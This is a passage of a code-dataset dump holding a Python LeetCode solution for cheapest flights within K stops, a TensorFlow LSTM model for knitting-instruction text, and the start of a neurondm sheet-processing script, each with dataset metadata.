"call"}, {"api_name": "dash_html_components.H4", "line_number": 358, "usage_type": "call"}, {"api_name": "dash_html_components.H6", "line_number": 359, "usage_type": "call"}, {"api_name": "dash_table.DataTable", "line_number": 363, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 388, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 389, "usage_type": "call"}, {"api_name": "dash_html_components.H4", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 393, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 395, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Modal", "line_number": 402, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalHeader", "line_number": 404, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalBody", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.ModalFooter", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Button", "line_number": 407, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 426, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 420, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 421, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 441, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 435, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 436, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 458, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 474, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 475, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 480, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 481, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 501, "usage_type": "call"}, {"api_name": "dash_html_components.Th", "line_number": 502, "usage_type": "call"}, {"api_name": "dash_html_components.Tr", "line_number": 507, "usage_type": "call"}, {"api_name": "dash_html_components.Td", "line_number": 508, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 450, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 451, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 452, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 453, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 550, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 552, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 590, "usage_type": "call"}, {"api_name": "pandas.melt", "line_number": 653, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 653, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 656, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 656, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 516, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 517, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 518, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 519, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 520, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 522, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 523, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 524, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 525, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 526, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 527, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 528, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 529, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 530, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 531, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 532, "usage_type": "call"}, {"api_name": "dash.dependencies.State", "line_number": 533, "usage_type": "call"}]} +{"seq_id": "423178726", "text": "# Time: O((|E| + |V|) * log|V|) = O(|E| * log|V|),\n# if we can further to use Fibonacci heap, it would be O(|E| + |V| * log|V|)\n# Space: O(|E| + |V|) = O(|E|)\n\n# 787\n# There are n cities connected by m flights. Each fight starts from city u and arrives at v with a price w.\n#\n# Now given all the cities and fights, together with starting city src and the destination dst,\n# your task is to find the cheapest price from src to dst with up to k stops.\n# If there is no such route, output -1.\n#\n# Example 1:\n# Input:\n# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n# src = 0, dst = 2, k = 1\n# Output: 200\n# Explanation:\n# The cheapest price from city 0 to city 2 with at most 1 stop costs 200, as marked red in the picture.\n#\n# Example 2:\n# Input:\n# n = 3, edges = [[0,1,100],[1,2,100],[0,2,500]]\n# src = 0, dst = 2, k = 0\n# Output: 500\n#\n# Explanation:\n# The cheapest price from city 0 to city 2 with at most 0 stop costs 500, as marked blue in the picture.\n# Note:\n# - The number of nodes n will be in range [1, 100], with nodes labeled from 0 to n - 1.\n# - The size of flights will be in range [0, n * (n - 1) / 2].\n# - The format of each flight will be (src, dst, price).\n# - The price of each flight will be in the range [1, 10000].\n# - k is in the range of [0, n - 1].\n# - There will not be any duplicated flights or self cycles.\n\nimport collections\nimport heapq\n\n\nclass Solution(object):\n # Dijkstra with dict\n def findCheapestPrice(self, n, flights, src, dst, K): # USE THIS\n graph = collections.defaultdict(dict)\n for u, v, w in flights:\n graph[u][v] = w\n\n best = {}\n heap = [[0, src, 0]] # cost, node, step\n while heap:\n cost, node, step = heapq.heappop(heap)\n if node == dst:\n return cost\n if (node, step) in best or step > K:\n continue\n best[node, step] = cost\n\n for nei, w in graph[node].items():\n if (nei, step + 1) not in best:\n heapq.heappush(heap, (cost + w, nei, step + 1))\n return -1\n\n # wrong: return 9 for 1st testcase. Each state must bre represented by (node, steps),\n # otherwise lower steps path is missing.\n def findCheapestPrice_wrong(self, n, flights, src, dst, K):\n graph = [{} for _ in range(n)]\n for u, v, w in flights:\n graph[u][v] = w\n\n best, pq = set(), [(0, src, 0)]\n while pq:\n p, node, stops = heapq.heappop(pq)\n if node == dst:\n return p\n\n if node not in best and stops <= K:\n best.add(node)\n\n for nei, w in graph[node].items():\n if nei not in best:\n heapq.heappush(pq, (p + w, nei, stops + 1))\n return -1\n\n # Dijkstra with list\n def findCheapestPrice2(self, n, flights, src, dst, K):\n graph = [{} for _ in range(n)]\n for u, v, p in flights:\n graph[u][v] = p\n\n # K stops means can move K+1 steps, store and update the best price for each step separately\n # no need to fill best[src][0] as 0 like stepless Dijkstra does, because we won't go back to overwrite step 0.\n best = [[float('inf')] * (K + 2) for _ in range(n)]\n minHeap = [(0, src, 0)] # (price, node-to-reach, step-needed)\n while minHeap:\n price, node, step = heapq.heappop(minHeap)\n if node == dst:\n return price\n if step > K or price > best[node][step]: # prune\n continue\n for nei, p in graph[node].items():\n if price + p < best[nei][step + 1]:\n heapq.heappush(minHeap, (price + p, nei, step + 1))\n best[nei][step + 1] = price + p\n\n return -1\n\n\n def findCheapestPrice_kamyu(self, n, flights, src, dst, K):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n adj = collections.defaultdict(list)\n for u, v, w in flights:\n adj[u].append((v, w))\n best = collections.defaultdict(lambda: collections.defaultdict(lambda: float(\"inf\")))\n min_heap = [(0, src, K+1)]\n while min_heap:\n result, u, k = heapq.heappop(min_heap)\n if k < 0 or best[u][k] < result:\n continue\n if u == dst:\n return result\n for v, w in adj[u]:\n if result+w < best[v][k-1]:\n best[v][k-1] = result+w \n heapq.heappush(min_heap, (result+w, v, k-1))\n return -1\n\nprint(Solution().findCheapestPrice(5,\n [[0,1,5],[1,2,5],[0,3,2],[3,1,2],[1,4,1],[4,2,1]], 0, 2, 2)) # 7\nprint(Solution().findCheapestPrice(3, [[0,1,100],[1,2,100],[0,2,500],[1,0,600]], 0, 2, 1)) # 200\nprint(Solution().findCheapestPrice(3, [[0,1,100],[1,2,100],[0,2,500]], 0, 2, 0)) # 500", "sub_path": "Python/cheapest-flights-within-k-stops.py", "file_name": "cheapest-flights-within-k-stops.py", "file_ext": "py", "file_size_in_byte": 4993, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.defaultdict", "line_number": 43, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 50, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 59, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 71, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 80, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 94, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 101, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 116, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 119, "usage_type": "call"}, {"api_name": "heapq.heappop", "line_number": 122, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "553365020", "text": "#!/usr/bin/env python\n\"\"\"\nRepresentation of the knitting instructions language model.\n\"\"\"\n\nfrom utilities import create_path_if_doesnt_exist\nfrom lexicon import Lexicon\nimport os\nimport errno\nimport json\n\nimport tensorflow as tf\nimport logging\n\n\nclass Model(object):\n \"\"\"\n Base class for the knitting instructions language model.\n\n Parameters\n ----------\n folder : str\n Folder where to save the model.\n lexicon : Lexicon, optional\n A previously compiled lexicon to use.\n graph : tf.Graph, optional\n A previously created Tensorflow graph to use.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None):\n self.folder = folder\n self.lexicon = lexicon\n self.graph = graph\n create_path_if_doesnt_exist(folder)\n\n self.features = None\n self.prediction_indices = None\n self.prediction_probabilities = None\n\n def initialize(self, session):\n \"\"\"\n Initialize a session for the model.\n\n Parameters\n ----------\n session : tf.Session\n The session to initialize.\n \"\"\"\n pass\n\n\nclass TrainingModel(Model):\n \"\"\"\n A trainable knitting instructions language model. Can be trained, but is heavy.\n\n Parameters\n ----------\n training_data : TrainingData\n The training data used to generate the model, if starting from scratch.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None, training_data=None):\n super(TrainingModel, self).__init__(folder, lexicon, graph)\n self.training_data = training_data\n\n self.latest_checkpoint_path = None\n\n self.responses = None\n self.loss = None\n self.perplexity = None\n self.minimize = None\n self.step = None\n\n self.saver = None\n\n def load(self):\n \"\"\"\n Load the model either from the provided lexicon and graph, or from saved files (if they exist), or by compiling\n it from scratch using data.\n \"\"\"\n if not self.lexicon:\n try:\n logging.info(\"[Importing lexicon]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'r') as lexicon_file:\n self.lexicon = Lexicon(json.load(lexicon_file))\n except IOError as exception:\n if exception.errno == errno.ENOENT:\n logging.info(\"[Compiling lexicon]\")\n self.lexicon = self.training_data.compile_lexicon()\n with open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n else:\n raise\n\n if not self.graph:\n self.latest_checkpoint_path = tf.train.latest_checkpoint(self.folder)\n if self.latest_checkpoint_path is not None:\n logging.info(\"[Importing graph]\")\n self.saver = tf.train.import_meta_graph(self.latest_checkpoint_path + '.meta')\n else:\n logging.info(\"[Building graph]\")\n self.build_default_graph()\n self.graph = tf.get_default_graph()\n\n self.features = self.graph.get_tensor_by_name(\"input/features:0\")\n self.prediction_indices = self.graph.get_tensor_by_name(\"output/prediction_indices:0\")\n self.prediction_probabilities = self.graph.get_tensor_by_name(\"output/prediction_probabilities:0\")\n self.responses = self.graph.get_tensor_by_name(\"output/responses:0\")\n self.loss = self.graph.get_tensor_by_name(\"output/loss:0\")\n self.perplexity = self.graph.get_tensor_by_name(\"output/perplexity:0\")\n self.minimize = self.graph.get_tensor_by_name(\"operations/minimize:0\")\n self.step = self.graph.get_tensor_by_name(\"step:0\")\n\n if not self.saver:\n self.saver = tf.train.Saver()\n\n def build_default_graph(self):\n \"\"\"\n Build a new Tensorflow graph and set it as the default.\n \"\"\"\n lexicon_size = len(self.lexicon.tokens)\n embedding_size = 200\n memory_size = 200\n\n lstm_cell = tf.nn.rnn_cell.LSTMCell(memory_size)\n\n tf.reset_default_graph()\n padding = tf.constant(self.lexicon.padding_index)\n with tf.name_scope('input'):\n features = tf.placeholder(tf.int32, shape=[None, None], name=\"features\")\n sequence_lengths = tf.reduce_sum(tf.to_int32(tf.not_equal(features, padding)), axis=1)\n\n with tf.device(\"/cpu:0\"):\n embedding = tf.get_variable(\"embedding\", shape=[lexicon_size, embedding_size],\n initializer=tf.contrib.layers.xavier_initializer(), dtype=tf.float32)\n embedded_features = tf.nn.embedding_lookup(embedding, features)\n\n with tf.name_scope('lstm') as scope:\n lstm_activations, _ = \\\n tf.nn.dynamic_rnn(lstm_cell, embedded_features, sequence_length=sequence_lengths, scope=scope,\n dtype=tf.float32)\n flattened_lstm_activations = tf.reshape(lstm_activations, [-1, memory_size])\n\n with tf.name_scope('output'):\n weights = tf.get_variable(\"weights\", shape=[memory_size, lexicon_size],\n initializer=tf.contrib.layers.xavier_initializer())\n bias = tf.get_variable(\"bias\", shape=[1, lexicon_size],\n initializer=tf.contrib.layers.xavier_initializer())\n flat_units = tf.matmul(flattened_lstm_activations, weights) + bias\n\n responses = tf.placeholder(tf.int32, shape=[None, None], name=\"responses\")\n flat_responses = tf.reshape(responses, [-1])\n flat_losses = tf.nn.sparse_softmax_cross_entropy_with_logits(flat_units, flat_responses)\n\n mask = tf.to_float(tf.not_equal(features, padding))\n flat_mask = tf.reshape(mask, [-1])\n\n masked_losses = tf.reshape(flat_losses * flat_mask, tf.shape(features))\n loss = tf.reduce_mean(tf.reduce_sum(masked_losses, 1) / tf.to_float(sequence_lengths), name=\"loss\")\n perplexity = tf.exp(loss, name=\"perplexity\")\n\n units = tf.reshape(flat_units, tf.concat(0, [tf.shape(features), [lexicon_size]]))\n final_units = self.end_of_sequences(units, sequence_lengths)\n\n prediction_indices = tf.tile(tf.reshape(tf.range(lexicon_size), [1, -1]), [tf.shape(features)[0], 1],\n name=\"prediction_indices\")\n prediction_probabilities = tf.nn.softmax(final_units, name=\"prediction_probabilities\")\n\n with tf.name_scope(\"operations\"):\n step = tf.get_variable(\"step\", shape=[], initializer=tf.constant_initializer(0), trainable=False)\n minimize = tf.train.AdamOptimizer().minimize(loss, global_step=step, name=\"minimize\")\n\n @staticmethod\n def end_of_sequences(tensor, sequence_lengths):\n \"\"\"\n Utility function to select the end of sequences in a batch padded sequence tensor.\n\n Parameters\n ----------\n tensor : tf.Tensor\n The batch padded sequence tensor.\n sequence_lengths : tf.Tensor\n The lengths of every sentence in the batch.\n\n Returns\n -------\n The tensors at the end of the sequence, i.e.\n [tensor[0, sequence_lengths[0], :], ..., tensor[-1, sequence_lengths[-1], :]]\n \"\"\"\n sequences_range = tf.reshape(tf.range(0, tf.shape(tensor)[0], dtype=tf.int32), shape=[-1, 1])\n sequence_lengths = tf.reshape(sequence_lengths, shape=[-1, 1])\n indices = tf.concat(1, [sequences_range, sequence_lengths - 1])\n ends_of_sequences = tf.gather_nd(tensor, indices)\n return ends_of_sequences\n\n def initialize(self, session):\n if self.latest_checkpoint_path:\n logging.info(\"[Restoring previous checkpoint]\")\n self.saver.restore(session, self.latest_checkpoint_path)\n else:\n logging.info(\"[Initializing session]\")\n session.run(tf.global_variables_initializer())\n\n def save(self, session):\n \"\"\"\n Save a snapshot of the model in a session.\n\n Parameters\n ----------\n session : tf.Session\n The session that provides the snapshot.\n \"\"\"\n logging.info(\"[Saving checkpoint]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n self.saver.save(session, os.path.join(self.folder, 'generator'))\n\n def export_for_production(self, folder, session):\n \"\"\"\n Turn the model into a production model, by freezing variables into constants and removing training nodes.\n\n Parameters\n ----------\n folder : str\n The folder where to save the production model.\n session : tf.Session\n The session from which to fetch the variable values.\n\n Returns\n -------\n ProductionModel\n The production-ready model.\n \"\"\"\n logging.info(\"[Exporting final model]\")\n frozen_graph_def = tf.python.graph_util.convert_variables_to_constants(\n sess=session, input_graph_def=self.graph.as_graph_def(),\n output_node_names=[\"output/prediction_indices\", \"output/prediction_probabilities\"])\n tf.reset_default_graph()\n tf.import_graph_def(frozen_graph_def, name='')\n return ProductionModel(folder, lexicon=self.lexicon, graph=tf.get_default_graph())\n\n\nclass ProductionModel(Model):\n \"\"\"\n A production-ready knitting instructions language model. Cannot be trained further, but is light.\n \"\"\"\n def __init__(self, folder, lexicon=None, graph=None):\n super(ProductionModel, self).__init__(folder, lexicon, graph)\n\n def load(self):\n \"\"\"\n Load the model either from the provided lexicon and graph, or from saved files (if they exist).\n \"\"\"\n if not self.lexicon:\n try:\n logging.info(\"[Loading lexicon]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'r') as lexicon_file:\n self.lexicon = Lexicon(json.load(lexicon_file))\n except IOError as exception:\n if exception.errno == errno.ENOENT:\n raise IOError(\"Cannot find the lexicon file. A production model cannot generate its lexicon.\")\n else:\n raise\n\n if not self.graph:\n logging.info(\"[Loading graph]\")\n with tf.gfile.GFile(os.path.join(self.folder, \"graph.pb\"), \"rb\") as graph_file:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(graph_file.read())\n tf.import_graph_def(graph_def, name=\"\")\n self.graph = tf.get_default_graph()\n\n self.features = self.graph.get_tensor_by_name(\"input/features:0\")\n self.prediction_indices = self.graph.get_tensor_by_name(\"output/prediction_indices:0\")\n self.prediction_probabilities = self.graph.get_tensor_by_name(\"output/prediction_probabilities:0\")\n\n def save(self):\n \"\"\"\n Save the model to the folder.\n \"\"\"\n logging.info(\"[Saving model]\")\n with open(os.path.join(self.folder, \"lexicon.json\"), 'w') as lexicon_file:\n json.dump(self.lexicon.tokens, lexicon_file)\n with tf.gfile.GFile(os.path.join(self.folder, 'graph.pb'), \"wb\") as file_handle:\n file_handle.write(self.graph.as_graph_def().SerializeToString())\n", "sub_path": "generator/model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 11590, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "utilities.create_path_if_doesnt_exist", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "lexicon.Lexicon", "line_number": 83, "usage_type": "call"}, {"api_name": "json.load", "line_number": 83, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 85, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 94, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 113, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 123, "usage_type": "attribute"}, {"api_name": "tensorflow.reset_default_graph", "line_number": 125, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 128, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 128, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.to_int32", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 129, "usage_type": "call"}, {"api_name": "tensorflow.device", "line_number": 131, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.embedding_lookup", "line_number": 134, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 134, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.nn.dynamic_rnn", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 144, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 144, "usage_type": "attribute"}, {"api_name": "tensorflow.get_variable", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.contrib.layers.xavier_initializer", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 146, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 147, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 149, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 150, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 151, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 151, "usage_type": "attribute"}, {"api_name": "tensorflow.to_float", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.not_equal", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 154, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 156, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.to_float", "line_number": 157, "usage_type": "call"}, {"api_name": "tensorflow.exp", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.tile", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 163, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 168, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 188, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 189, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 190, "usage_type": "call"}, {"api_name": "tensorflow.gather_nd", "line_number": 191, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 196, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 199, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 200, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 211, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 212, "usage_type": "call"}, {"api_name": "os.path", "line_number": 212, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 214, "usage_type": "call"}, {"api_name": "os.path", "line_number": 214, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.python.graph_util.convert_variables_to_constants", "line_number": 233, "usage_type": "call"}, {"api_name": "tensorflow.python", "line_number": 233, "usage_type": "attribute"}, {"api_name": "tensorflow.reset_default_graph", "line_number": 236, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 237, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 238, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 254, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 255, "usage_type": "call"}, {"api_name": "os.path", "line_number": 255, "usage_type": "attribute"}, {"api_name": "lexicon.Lexicon", "line_number": 256, "usage_type": "call"}, {"api_name": "json.load", "line_number": 256, "usage_type": "call"}, {"api_name": "errno.ENOENT", "line_number": 258, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 264, "usage_type": "call"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 265, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 265, "usage_type": "call"}, {"api_name": "os.path", "line_number": 265, "usage_type": "attribute"}, {"api_name": "tensorflow.GraphDef", "line_number": 266, "usage_type": "call"}, {"api_name": "tensorflow.import_graph_def", "line_number": 268, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 269, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path", "line_number": 280, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 281, "usage_type": "call"}, {"api_name": "tensorflow.gfile.GFile", "line_number": 282, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 282, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path", "line_number": 282, "usage_type": "attribute"}]} +{"seq_id": "16919437", "text": "import rdflib # FIXME decouple\nimport ontquery as oq\nfrom hyputils.hypothesis import idFromShareLink, shareLinkFromId\nfrom pyontutils.sheets import update_sheet_values, get_note, Sheet\nfrom pyontutils.scigraph import Vocabulary\nfrom pyontutils.namespaces import ilxtr, TEMP, definition\nfrom pyontutils.closed_namespaces import rdfs, rdf\nfrom neurondm import NeuronCUT, Config, Phenotype, LogicalPhenotype\nfrom neurondm.models.cuts import make_cut_id, fixname\nfrom neurondm.core import log, OntId, OntTerm\n\n\ndef normalizeDoi(doi):\n if 'http' in doi:\n doi = '10.' + doi.split('.org/10.', 1)[-1]\n elif doi.startswith('doi:'):\n doi = doi.strip('doi:')\n elif doi.startswith('DOI:'):\n doi = doi.strip('DOI:')\n return doi\n\n\ndef select_by_curie_rank(results):\n ranking = 'CHEBI', 'UBERON', 'PR', 'NCBIGene', 'NCBITaxon', 'GO', 'SAO', 'NLXMOL'\n def key(result):\n if 'curie' in result:\n curie = result['curie']\n else:\n return len(results) * 3\n\n prefix, _ = curie.split(':')\n if prefix in ranking:\n try:\n return ranking.index(result['curie'])\n except ValueError:\n return len(results) + 1\n else:\n return len(results) * 2\n\n return sorted(results, key=key)[0]\n\n\ndef process_note(raw_note):\n if raw_note is None:\n return None\n p = ilxtr.literatureCitation\n for bit in (b.strip() for b in raw_note.split('\\n') if b.strip()):\n maybe_hypothesis = idFromShareLink(bit)\n if maybe_hypothesis:\n # TODO getDocInfoFromHypothesisId(maybe_hypothesis)\n yield p, rdflib.URIRef(shareLinkFromId(maybe_hypothesis))\n elif 'doi:' in bit or 'DOI:' in bit or 'doi.org' in bit:\n yield p, rdflib.URIRef('https://doi.org/' + normalizeDoi(bit))\n elif bit.startswith('http'): # TODO parse the other things\n yield p, rdflib.URIRef(bit)\n else:\n yield p, rdflib.Literal(bit) # FIXME cull editorial notes\n\n\ndef sheet_to_neurons(values, notes_index, expect_pes):\n # TODO import existing ids to register by label\n sgv = Vocabulary()\n e_config = Config('common-usage-types')\n e_config.load_existing()\n query = oq.OntQuery(oq.plugin.get('rdflib')(e_config.core_graph), instrumented=OntTerm)\n # FIXME clear use case for the remaining bound to whatever query produced it rather\n # than the other way around ... how to support this use case ...\n existing = {str(n.origLabel):n for n in e_config.neurons()}\n def convert_header(header):\n if header.startswith('has'): # FIXME use a closed namespace\n return ilxtr[header]\n else:\n return None\n\n def convert_other(header):\n if header == 'label':\n return rdfs.label\n elif header == 'curie':\n return 